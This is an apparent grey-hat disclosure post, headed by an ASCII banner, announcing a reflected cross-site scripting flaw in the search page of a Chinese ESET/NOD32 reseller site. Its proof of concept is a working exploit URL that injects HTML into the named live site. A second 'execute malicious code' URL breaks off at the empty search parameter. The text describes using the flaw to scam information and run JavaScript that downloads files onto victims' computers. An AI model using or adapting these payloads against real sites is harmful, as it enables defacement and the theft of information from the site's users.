.___________ ________ http://www.nod32.com.cn ____ ____ __| _/\_____ \ \_____ \ ____ ____ / \ / _ \ / __ | _(__ < / ____/ _/ ___\ / \ | | ( <_> ) /_/ | / \/ \ \ \___| | \ |___| /\____/\____ | /______ /\_______ \ / \___ >___| / \/ \/ \/ \/ \/ \/ \/ > Cross Site Scripting Exploit > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com > Vulnerability: Cross Site Scripting ————————- 1. INFORMATION | ————————- Site: http://www.nod32.com.cn Vulnerability: Cross Site Scripting Vulnerability Level: 3 ————————- 2. DESCRIPTION | ————————- http;//www.nod32.com.cn suffers a remote cross site scripting exploit, which can be used to scam information and to execute malicious javascript which might remotely download a file to the victim’s PC. ————————- 3. PROOF OF CONCEPT | ————————- Display a message using HTML: http://www.eset.com.cn/default.php?id=181&p=24&searchword=%3Ch1%3EXSS+-+Sora%3C%2Fh1%3E%3E%22%3Ctitle%3E%3Cmarquee%3EXSS%20by%20Sora%20-%20IMPROVE%20YOUR%20SECURITY%20-%20greyhathackers.wordpress.com&btnG= Execute malicious code: http://www.eset.com.cn/default.php?id=181&p=24&searchword=